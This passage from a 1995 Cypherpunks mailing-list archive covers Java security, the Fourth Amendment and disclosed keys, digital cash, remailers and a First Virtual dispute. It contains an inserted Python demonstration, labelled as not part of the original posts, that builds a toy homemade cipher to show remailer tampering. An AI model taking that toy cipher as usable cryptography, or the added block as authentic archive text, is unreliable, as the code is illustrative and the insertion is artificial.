> > It's interesting to note that all the people that were raving mad about
> > Java seem to be quiet now that MS is proposing to use VB. At least Java
> > was designed from the ground up with security in mind. But VB?

Java was not designed from the ground up with security in mind. Not by
a long shot.  It was an incubator project.  I know that.  And the Java
team knows that as well.  

And the ones who WERE raving about Java -- myself and others -- might
simply be attempting to speak to Sun through some non-public channels.
I, as an example, have tried to speak with my local Sun software
manager, Warren Strange, about Java and voice some of my concerns,
that way.

(Yep, that's his name ... "STRANGE" ... what else would you expect
with a company whose Canadian subsidiary is run by an "Everett", and
who has a Vice-President named "Tribble".)

Mind you ... I got absolutely _nowhere_ with Mr. Strange.  

I think he said that James Gosling was WAY too busy (as was he), and
that the last time he had checked Gosling had 800 email messages in
his mailbox, and that I should probably post my questions to
comp.lang.java, if I expected any answers.  

I really didn't have the heart to tell him, that I generally avoid
comp altogether, and stick primarily to the alt hierarchy --
especially alt.fan.alt.bigfoot.  Strange as that might seem.

Then again, I tried to have a bit of quiet time with Everett after
Monday's Christmas party, but he never had any time for me.  Too busy,
I guess.  He was running off to shoot snooker with some of the boys
from Oracle, I think.

I think that takes precedence over customer concerns.

But the party was a smash.  They even had a guy doing magic tricks.
Shame I didn't bring any business cards with me to a social occasion.

Guess, I just wasn't trained right.

But I _did_ get a nifty Java T-shirt and a snazzy pin.  So it was
worth it.  And the smoked salmon was an unexpected surprise in "It had
better be Beef" Alberta.  It was a very nice touch.

I also tried to talk to a Sales Representative (grin) about this --
about Java security.  Poor man.  I think he was almost tearful, when
he snapped at me, "Why don't you attack Microsoft instead??"

So, I guess I might just do that, here.

Does anyone besides me, see a sucker-punch in Microsoft's announced
support for Java??  Support for a competitor's product??  I certainly
do, especially from the way I saw the press presentations fly out over
the airwaves.  

The media coverage seemed not to convey the "right" touch of
sincerity.

It seems like Gates wants to support and promote a product as being
appropriate for something that it isn't suited for, and isn't designed
for, while having his very own fall-back position with VB.

A sucker-punch.  Or at least that was my perception of it.  I don't
know about anyone else, here.

I wonder whether anyone from Sun smells a rat in Microsoft going this
route.  It seemed grossly out of character, for Microsoft.  Major
paradigm shifts such as this are truly unusual for large firms.
Especially Microsoft's IETF comments.

The frosting was just a little too sugary and thick, I think.

> And all this from a software company that took over 10 years to make 
> their "operating system" do preemptive *anything*.

It worries me when a company promotes another company's product
heavily, while only embracing it partially.  

Then again, what would I know.  I can get suckered into writing about
Microsoft's puffery by a single tearful Sun salesman.

Well, that, and some smoked salmon ... guess that rules me out for a
security clearance, huh??



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









> 
> But I guess I shouldn't complain.  After all, VB has made me a pretty 
> decent living for the past year or so...
> 

::
Request-Remailing-To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: FW: websurfer 4.6





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 23:46:19 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Python Cryptography Toolkit v1.0.0
In-Reply-To: <9512072158.AA15573@toad.com>
Message-ID: <199512080747.CAA06243@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Kuchling <andrewk@cst.ca> writes:
> I've just uploaded version 1.0.0 of the Python Cryptography Toolkit, a
> collection of cryptographic routines for the Python programming language.
> It's at ftp://ftp.cwi.nl/pub/pct/pycrypt100.tgz.  
[...]
> 	The Toolkit now contains various cryptographic algorithms such
> as DES, IDEA, MD5, etc.  
[...]
> 	Questions, comments, or suggestions are welcomed at the
> address below.

Sounds good. Here's some nitpicking:

(1) If you don't mind announcing that you've exported the software from
Canada to the Netherlands, why not just put it up for ftp at a Canadian 
site ? 

(2) Acronym overload: try to avoid calling your toolkit "PCT", since M$
already has some security protocol called PCT....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 23:59:31 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] WE WANT SOME PUSSY PICTURES
In-Reply-To: <199512080727.SAA19878@mail.mel.aone.net.au>
Message-ID: <199512080758.CAA05849@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nicholas Philp writes:
> WE WANT SOME PUSSY PICTURES

(Oops, soon it may be illegal for me to quote that)

http://callie.csci.unt.edu/~donr/cat-pics/index.html has good shots of Bonnie,
Brandy, and others. 

But why do you think this is relevant to c'punks ?

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 00:50:22 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <acecee610a021004a5f2@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951208034633.18878C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Timothy C. May wrote:

> At 2:27 AM 12/8/95, sameer wrote:
> >> > You mean if you give me your key the police can get it from me without a
> >> > warrant? What if I don't want to give it up, and you don't? How would the
> >> > police get it without a warrant?
> >>
> >> Yes.  Unless it could be shown there was an expectation of privacy
> >> in the transfer, or that there was an understanding that you intended this
> >> to be a confidential matter.  Or in the alternative, that the
> >
> >        I do not understand.
> >
> >Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> >Bob "I want Alice's key, you need to give it to me. I don't have a
> >warrant."
> >
> >How is this different from
> >Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
> >you need to give it to me. I don't have a warrant."
> >
> >
> >        sheesh, what a fucked up legal system.
>                         ^^^^^^^^^
> 
> EXON WARNING! This message has just exposed the author, the toad.com
> system, and all those who pass it on to fines of not less than $10,000!
> 
> But I share Sameer's confusion. If cops show up at my door, they must, it
> seems to me, present proper warrants before they can _enter_ my premises,
> or _search_ my premises. Something given to me, whether a letter, a key, a
> photo, etc., is essentially *my property* and may not simply be taken away
> from without due process.

There are MANY circumstances where a presence may be searched without a 
search warrant per se.  For example, a search of the premises incident to 
a lawful arrest.

> 
> I hope Black Unicorn is incorrect in his point.
>

Which point?  If you mean that the key is your property and not violable 
simply by virtue of that fact, then I have to tell you that you are 
overestimating the amount of protection you have.  You have to demonstrate a 
definite expectation of privacy in the key first.  Giving it to Alice 
tends to weaken your case in that regard.

Does the fact that you have given your key to Alice mean that the police 
can violate OTHER protections that the 4th amendment provides?  Of course 
not.  The police cannot just break down your door because you gave 
your key to Alice and it happens to be in your house.  Alice has 
nothing to do with the expectation of privacy you have in your 
house.  However, once they have their hands on the key, warrant or not, if 
you have not demonstrated an expectation of privacy in the item, you're not 
going to get Fourth amendment protections.

If I am talking in the wrong direction, present me with a direct question 
and I will try to confine my musings to its precise context.

> --Tim
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 00:54:29 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <30C7C407.4117@netscape.com>
Message-ID: <Pine.SUN.3.91.951208035312.18878E-100000-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > 
> > On Thu, 7 Dec 1995, sameer wrote:
> > 
> > > > > You mean if you give me your key the police can get it from me without a
> > > > > warrant? What if I don't want to give it up, and you don't? How would the
> > > > > police get it without a warrant?
> > > >
> > > > Yes.  Unless it could be shown there was an expectation of privacy
> > > > in the transfer, or that there was an understanding that you intended this
> > > > to be a confidential matter.  Or in the alternative, that the
> > >
> > >       I do not understand.
> > >
> > > Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> > > Bob "I want Alice's key, you need to give it to me. I don't have a
> > > warrant."
> > >
> > > How is this different from
> > > Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
> > > you need to give it to me. I don't have a warrant."
> > 
> > The real concern is this:
> > 
> > Bob gives his key to alice.
> > 
> > The cops walk into alice's place and 'convince' alice to turn the key
> > over without a warrant.  Perhaps alice is more susceptible to
> > persuasion because of some external reasons.  Alice does, Bob has no privacy
> > interest in the key, Bob can no longer argue that it is protected under
> > the 4th amendment.
> > 
> > Now let's get more sinister.
> > 
> > The cops mysteriously 'find' the key somewhere without a warrant.
> > Bob cannot argue that the key should be suppressed on the basis of the
> > 4th amendment because he gave it to Alice, and thus clearly it's not
> > information he was interested in protecting.  (This is assuming the cops
> > didn't violate other areas, or break into a house or something, or that
> > if they did, that the court will find out about it).
> 
>   How about if Bob had a contractual agreement with Alice to keep his
> key secret?

Then as a defense attorney, I would argue that Bob had an obvious 
expectation of privacy with Alice, and that the fact that he relayed this 
key to Alice only under those circumstances represents a definite 
expression of his intent to keep the key private, thus triggering 4th 
amendment protections.  My view is that this would be a very strong argument.

Note that this is an academic opinion, not a legal one as I am not being 
paid.

>
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 00:58:15 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080554.AAA05788@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951208035603.18878F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Futplex wrote:

> Black Unicorn writes:
> > Yes.  I have seen holdings which indicate that information given to an 
> > employer, where there was no obvious expectation that it be kept 
> > confidential, estopped 4th amendment protections to its introduction when 
> > obtained without a warrant.
> [...and...]
> > Again, because of the nature of the relationship.  There is an 
> > expectation that a conversation with an attorney is one of the most 
> > private exchanges you can engage in.  As for rare exceptions, I'm not so 
> > sure I would term them rare.
> 
> What happens if I disclose a key to my employer's corporate law firm ?
> Does that clearly lie one way or the other, or would it likely hinge upon 
> the conditions under which I came to reveal the key ?

This becomes highly speculative.

My inclination is to say that it would hinge on the conditions under 
which you tendered the key to the legal department of your employer.  
This is a question of law, and would probably depend as much on the judge 
as on the circumstances.  Remember, 4th amendment rulings AGAINST the 
prosecution are very tough for a judge to make, because they usually mean 
excluding evidence key to the prosecution's case, and most often they 
arise in circumstances where the defendant looks guilty as sin.

> -Futplex <futplex@pseudonym.com>

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Date: Fri, 8 Dec 95 01:14:03 PST
To: cypherpunks@toad.com
Subject: Re: Cyberia-L Archive [was Re: ERA_sur]
Message-ID: <199512080913.EAA25980@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.ULT.3.91.951206142028.4575V-100000@Networking.Stanford.EDU> you write:
>As somebody pointed out to me, Cyberia-L, like cypherpunks, is archived 
>on http://www.hks.net/ and the public news server nntp.hks.net.

!!!  As far as I know, Cyberia-L isn't accessable via http from us.  Please
let me know if it is...if so something's very misconfigured.

The nntp part is correct, though.  And a bunch of the lists might soon be
added to the http archives: cypherpunks is the test message base for it.

>Now send them some of the money you're going to make from the stock market.

That'd be way nice...  Small unmarked bills are preferred.
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMgBryoZzwIn1bdtAQGB3gGA15WO7RLcosT3hrjEJN9d0H6Fk0fMu4lG
E/cw+h9YZcB6Nk0jiURfceCkBSz4+JSC
=TnoU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Thu, 7 Dec 95 20:32:18 PST
To: cypherpunks@toad.com
Subject: Oh Yeah?  ipsecure
Message-ID: <199512080435.EAA19138@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain



For Immediate Release

Contact:  National Semiconductor
          Lori Sinton (408) 721-2448
          lori@ipower.nsc.com
          http://www.ipsecure.com


CryptoSampler, from National Semiconductor, Demonstrates Ease of
     Building Secure Electronic Commerce and Communications
                          Applications

   Company's iPower(tm) Business Unit Launches Free CryptoSolver
                   to Inaugurate New Web Site


SANTA CLARA, Calif., November 27, 1995 --- National Semiconductor
Corporation today announced the availability of its CryptoSampler
package for applications developers interested in gaining a "hands on"
understanding of how cryptography solves modern business problems.
Developed by National's iPower Business Unit, the program consists of
three demonstration applications and the PersonaCard(tm) 100, a
hardware token for personal, portable data security.

     The package contains both the demonstration applications
including "build-it-yourself" tools to integrate security easily
into electronic commerce and communications applications. Priced at
$129, the CryptoSampler package is available to the first 1,000 U. S.
respondents and can be ordered directly from National's iPower
Business Unit.

     In a related move, the company's iPower Business Unit launched
its own web site along with CryptoSolver, an interactive game that
invites participants to solve encrypted messages based on the concepts
of substitution ciphers and the alphabetic frequency table.
CryptoSolver, a technology-teaser game, rates players' deciphering
skills and can be downloaded from iPower's new web site free.

"As networks become the lifeblood of corporations and the principal
means of commerce, securing electronic transactions and proprietary
information over public and private networks is absolutely critical,"
said Tom Rowley, marketing director for National's iPower Business
Unit. "Through this program, we hope to help broaden individuals'
understanding of how modern security technology can solve real
problems on the Internet and in Electronic Commerce business
applications," Rowley explained.

CryptoSampler Package - Token Plus Three Applications in One
------------------------------------------------------------

     The CryptoSampler package consists of a PersonaCard 100 data
security token, a floppy disk containing all three demonstration
applications, a cryptography primer written by recognized cryptography
expert Bruce Schneier, and a questionnaire. Customers who choose to
complete and return the questionnaire, will receive a free copy, while
supplies last, of Bruce Schneier's newly-released book, Applied
Cryptography, second edition.

o PersonaScreen(tm) System Lockout Utility is a screen locker that
  prevents unauthorized entry into a personal computer by locking the
  keyboard and mouse. The PersonaCard Token, implemented in the PC
  Card (formerly PCMCIA) Type II format, locks and unlocks the desktop
  computer.

o PersonaSecure(tm) Word Utility enables users to sign, seal (encrypt,
  decrypt), and verify documents as well as e-mail messages from
  within Microsoft Word 6.0 for Windows. Installed automatically,
  PersonaSecure displays a toolbar that corresponds to the functions
  of National's PersonaCard data security token. The hardware token
  incorporates RSA's industry-standard digital signature and
  encryption formats which are now "token aware." In addition to
  protecting and validating Microsoft Word documents, users can
  encrypt and decrypt e-mail messages with others who have installed
  the PersonaSecure Word Utility.

o PersonaDLL Library for Visual BASIC 3.0 is a Dynamic Link Library
  (DLL) of routines that enables developers to quickly and easily
  develop their own applications incorporating high-level data
  security features. PersonaDLL includes a Visual BASIC application,
  Visual BASIC source code, and access to all of the features of the
  PersonaCard 100 token including digital signatures, RSA key
  generation, encryption, and verification.

     System requirements to run the CryptoSampler package are:
Microsoft Windows 3.X, Windows for Workgroups 3.X, and a PC Card slot
(version 2.1 or later). Microsoft Word 6.0 is required for the
PersonaSecure Word Utility.


Pricing and Availability
------------------------
     The CryptoSampler package is available with or without a PC Card
Reader. For those who plan to run CryptoSampler applications on a
desktop or portable personal computer already equipped with a PC Card
slot, the basic package is offered at a special price of $129
(including handling and shipping). A CryptoSampler package with PC
Card reader is available for $199. The total retail value of the basic
package and configuration with card reader is $300 and $500,
respectively.

     To order  the CryptoSampler package in either configuration, call
1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central
Standard Time.  To play CryptoSolver and for more information about
the CryptoSampler program, see the iPower web site at
http://www.ipsecure.com  .

iPower Security Solutions
-------------------------
     Introduced a year ago, iPower technology provides the
highest-level of commercially available security in a personal,
portable hardware token. iPower solutions are already being
incorporated by OEMs, ISVs, and VARs into a variety of applications
and hardware platforms including e-mail and messaging, electronic
commerce, network security, and secure access to on-line services
including the Internet.

National Semiconductor Corporation provides technologies for moving
and shaping information. The company focuses on four key areas -
communications, consumer, industrial, and personal systems. National
Semiconductor is headquartered in Santa Clara, California, and has
22,300 employees worldwide.

                              -30-

Note to Editors: To receive a CryptoSampler package for review, call
or e-mail Lori Sinton, 408 721-2448 or sampler@ipower.nsc.com

iPower and PersonaCard are trademarks of National Semiconductor
Corporation. All other trademarks are held by their respective
companies.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 8 Dec 95 01:46:38 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: digital receipts and cash
In-Reply-To: <199512010408.UAA04333@quito.CS.Berkeley.EDU>
Message-ID: <199512080947.EAA06459@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Wagner writes:
> (Later, if the vendor reneges on the transaction, you'd have the digital
> receipt to prove that you paid & the vendor is cheating you.)
> 
> This seems like it would be a really useful feature.  Does anyone know
> if there are any *practical* protocols to do this?
[...]
> ObCrypto relevance: I've looked through _Applied Cryptography_, but the
> protocols listed there aren't practical -- they require something like
> 100 rounds of interaction!  Can this be improved?

The Even/Goldreich/Lempel protocol (ACv1, pp.101-103) requires O(k) fairly
expensive operations (i.e. key generations, encryptions, network 
transmissions) to guarantee honesty with probability p = 2^k. k = 100 is
suggested. Perhaps this protocol would be useful in many applications with
k << 100. It might be argued that k need only be about 
O(lg(value(transaction))). I think k = 10 or 20 would be suitable for many
relatively low-value digital cash transactions. Waiting a bit longer to
arrange the purchase of a car over the net sounds tolerable to me.

I suppose you could precompute heaps of keys for use in unspecified future
transactions, which helps a bit.

It's hard to imagine circumventing the basic need for incremental increases
in trust, with a nontrivial cryptographic operation at each end in each
round. But hey, I certainly don't expect to prove that anytime soon.... :) 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Dec 95 02:44:42 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems?
Message-ID: <2.2b8.32.19951208104734.00878b10@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:40 PM 12/7/95 -0500, Nathaniel Borenstein wrote:

>None at all, if you can find an underwriter who is comfortable with the
>fact that his investigative options will be limited in the case of
>suspiciously large or suspiciously frequent "cash out" events from a
>given customer.  Apparently Mark Twain Bank finds that risk acceptable. 
>I'm sure the larger banks will be watching quite closely.

I seem to remember from my favorite Law School class -- Commercial Paper --
that banks weren't liable if they paid out an account from cleared funds
under the terms of the account.  A bank is responsible for payments made on
a forged drawer's signature and anyone who accepts an instrument from a
forged endorser eats the loss.  But online clearing with digital signatures
makes it hard to forge the drawer's signature and digital cash doesn't have
the sort of endorsement system used on paper checks.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 8 Dec 95 03:45:23 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Still more on the Digicash protocol
In-Reply-To: <199512071610.KAA16536@admin.starnet.net>
Message-ID: <199512081146.GAA06511@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky (wearing his MTB hat) writes:
> So when will the user pay with a wildcard coin? To make a payment to a party
> that is (pseudo-) anonymous to the payor. That is, if the payor sends the
> payment via anonymous remailer, in which case the messages should be
> encrypted anyway.
> 
> [Why a remailed message should be encrypted is left as an exercise to the
> reader.]

I don't think that's axiomatic. 

To be clear, I'm _not_ talking about encryption using the public keys of the 
remailers in a chain. I certainly do not wish to dispute the advantages of 
using those. But such encryption is just a form of link encryption. It
doesn't prevent the final remailer (or anyone between the last remailer and 
the recipient) from altering the plaintext payor_id.

It seems to me that end-to-end encryption is not significantly more important
for remailed messages. Really, there's less information in the message when
it emerges from the last remailer, so there's less to protect than in the
ordinary case. Furthermore, it may not even be feasible, since I may not have 
a public key I can associate with my correspondent.

-Futplex <futplex@pseudonym.com>
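
The point made in the message above, that encryption to the remailers' keys does not stop the final remailer from altering the plaintext payor_id, shown as an added Python example that is not part of the original post. It assumes symmetric keys standing in for the remailers' and recipient's public keys, a toy HMAC-based cipher in place of PGP, and a constructed sample payment message.

```python
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN = 16, 32


def _subkeys(key):
    """Derive separate encryption and MAC keys from one shared key."""
    return (hashlib.sha256(b"enc" + key).digest(),
            hashlib.sha256(b"mac" + key).digest())


def _xor_stream(key, nonce, data):
    """Toy stream cipher: XOR data with an HMAC-SHA256 counter keystream."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + counter.to_bytes(4, "big"),
                           hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def seal(key, plaintext):
    """Encrypt-then-MAC; stands in for encrypting to one party's key."""
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(NONCE_LEN)
    body = _xor_stream(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def unseal(key, blob):
    """Verify the tag, then decrypt; raises ValueError on any alteration."""
    enc_key, mac_key = _subkeys(key)
    nonce = blob[:NONCE_LEN]
    body = blob[NONCE_LEN:-TAG_LEN]
    tag = blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return _xor_stream(enc_key, nonce, body)


# Constructed sample data: three remailer keys, one recipient key, one payment.
HOP_KEYS = [os.urandom(32) for _ in range(3)]
RECIPIENT_KEY = os.urandom(32)
PAYMENT = b"payor_id=alice;coin=CONSTRUCTED-SAMPLE"


def dishonest_last_hop(blob):
    """What a misbehaving final remailer can do with what it sees."""
    if b"payor_id=alice" in blob:
        # Plaintext is visible after the last layer: rewrite the field.
        return blob.replace(b"payor_id=alice", b"payor_id=mallory")
    # Only ciphertext is visible: the best it can do is corrupt a byte.
    damaged = bytearray(blob)
    damaged[NONCE_LEN] ^= 0x01
    return bytes(damaged)


def deliver(end_to_end, tamper):
    """Send PAYMENT through the chain; return what the recipient accepts.

    Returns the accepted bytes, or None if the recipient rejects the message.
    """
    inner = seal(RECIPIENT_KEY, PAYMENT) if end_to_end else PAYMENT
    blob = inner
    for key in reversed(HOP_KEYS):      # sender wraps one layer per remailer
        blob = seal(key, blob)
    for key in HOP_KEYS:                # each remailer peels its own layer
        blob = unseal(key, blob)
    if tamper:
        blob = dishonest_last_hop(blob)
    if not end_to_end:
        return blob                     # nothing left for the recipient to check
    try:
        return unseal(RECIPIENT_KEY, blob)
    except ValueError:
        return None


if __name__ == "__main__":
    for e2e in (False, True):
        for tamper in (False, True):
            print(f"end_to_end={e2e!s:5} tamper={tamper!s:5} ->",
                  deliver(e2e, tamper))
```

With only the per-remailer layers, the altered payor_id reaches the recipient looking like any other message; with an inner layer keyed to the recipient, the same alteration is rejected, which presupposes the sender has a key for the correspondent.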



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 8 Dec 95 03:52:43 PST
To: cman@communities.com (Douglas Barnes)
Subject: Re: More FUD from First Virtual
In-Reply-To: <v02120d01aced1ca6830e@[199.2.22.120]>
Message-ID: <okm2OdaMc50eFDgIEJ@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.limbo: 7-Dec-95 More FUD from First Virtual Douglas
Barnes@communiti (1157*)

> It is important to remember that Nat Borenstein is a principal

It's Nathaniel, please.

> in a company that very much does not want to see anonymous e-cash
> succeed. 

This is utter nonsense.  If you check the cypherpunks archive, you'll
find that a year ago I was talking about how to make Digicash succeed as
a floating currency.  Several people within FV thought it was
inappropriate for me to be giving free advice to "competing" payment
systems, but I think there's room for plenty of payment systems on the
net, and that nobody is going to monopolize the market with a single
payment scheme.  If I didn't want anonymous cash to succeed, why would I
waste my time explaining alternate models (not previously under
discussion!) about how to make it succeed?

I *am* skeptical about the extent to which anonymous cash *can* succeed,
but in point of fact I'd like to help.  I think society will be better
off if one of the payment options is truly anonymous.  I think that
level of privacy will inevitably carry a high surcharge, however, for
reasons that I keep pointing out and you keep ignoring.

> Their extremely backwards technology cannot compete in
> the long term with cryptography-based methods, and therefore they
> are compelled to run around the country and on the Internet, bad-
> mouthing cryptography and anonymity at every turn, while pointing
> to some charity work for Phil Z. as a fig leaf to cover their
> actions in this regard (sort of like Exxon building an artificial
> reef and claiming to be friends of the environment.)

Sticks and stones may hurt my bones, but I do feel an obligation to
provide an explanation for anyone who hasn't been following Mr. Barnes'
rantings over the last year.  

For reasons I really don't understand, Mr. Barnes seems to have a
personal vendetta against First Virtual. That's fine, it's his right. 
But there are some facts he prefers to ignore, in favor of spreading
misinformation and slurs:

1.  Our "backwards technology" includes what may be the world's most
sophisticated internet firewalls and email robots.  We were the first
people to connect the Internet to the financial networks (including,
indirectly, the Federal Reserve) and have operated the system for over a
year, with several breakin attempts every week, and nobody has even come
close to breaking in.  Internally, everyone in our company uses pgp
extremely heavily, and I suspect that if you go to more
"cryptography-oriented" companies you will NOT find that their CEO and
marketing people know how to use PGP.  They are, for the most part, all
talk and no action when it comes to cryptography.  We all use it every
day, even the non-technical people.  This has given us a lot of insights
into the strengths and weaknesses of cryptography in the hands of
non-technical people.

[FYI, newcomers to this discussion, it's sentences like the last one --
which imply that, horror of horrors, there are actually *weaknesses*
involved in the use of cryptography -- that Mr. Barnes refers to as
"bad-mouthing cryptography."   We call it common sense.]

2.  Our support for Phil Zimmermann is based on long-term friendship and
personal principles, and on the fact that our business relies critically
on PGP.  Phil is one of my personal heroes as far as network politics
are concerned.  He's also not the kind of person who would let himself
be used for publicity purposes, and he's totally uninhibited about
criticizing us when he disagrees with us.  (Just ask him!)  He's also
given us some advice on the use of PGP in the next-generation FV system,
which WILL use cryptography, but in a manner you don't expect, and with
more secure key management than you'll find in any existing or publicly
proposed payment system. 

> I have, on several occasions, refuted his "infinite liability" rant,
> but it keeps on resurfacing. A few months ago, I wrote a short tech
> note on why this claim doesn't hold water. I thought I might stretch
> it into something longer, but other things have more urgently
> grabbed my attention. 

Yes, you wrote this theoretical treatise and proposed it as a refutation
to some specific arguments about Digicash.  It wasn't relevant to the
digicash argument, at least at the time, so I didn't pay a lot of
attention.  But basically, what your argument comes down to is that in
the event of a catastrophe, users can be told they have to sacrifice
their anonymity if they want to keep their cash.  As I have said all
along, the basic tradeoff is between anonymity and risk limitation in
the event of disaster recovery.  If the digital bank can, at its
pleasure, tell you that your anonymity has been revoked unless you want
to just say goodbye to your money, then I think the anonymity was a sham
in the first place.  (Who's using fig leafs here?)  First Virtual
transactions are also generally untraceable unless First Virtual
decides (or is court-ordered) to trace them.  At least we're up front
about it and don't call that level of privacy "anonymity".  Your
solution to the problem -- that anonymous cash has infinite liability --
basically comes down to letting the bank make you stop being anonymous
whenever it chooses.  That's our solution, too.
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 8 Dec 95 03:55:56 PST
To: cypherpunks@toad.com
Subject: Java musings
Message-ID: <9512081153.AA07233@all.net>
MIME-Version: 1.0
Content-Type: text


Excellent musings.  I just wanted to add something here.  There is a
fundamental issue with Java, and that is control:

	People in charge of organizations are responsible for what goes
on within them.  Without proper controls, it's impossible to carry out
that responsibility.

	The people who want us to use Java are asking us to give up
control over the programs run by our computers.  They tell us to trust
them because they say they have come up with a nearly fool-proof system
for doing this safely.

	- They don't claim it's really secure, they only say it is
		harder to abuse than a C++ program.  But nobody in their
		right mind would make it organizational policy to allow
		users to load and run C++ programs from over the Internet
		at the push of a button, and the removal of the particular
		things removed by Java are not adequate to justify this
		increased trust.
	- They won't back up their claims of security by assuming liability
		for resulting damages.  Their liability disclaimers tell
		us they think their security is worth exactly nothing.
		They are asking us to bet control of our IT on a product
		that they take no responsibility for.
	- They don't even provide us with the ability to control their
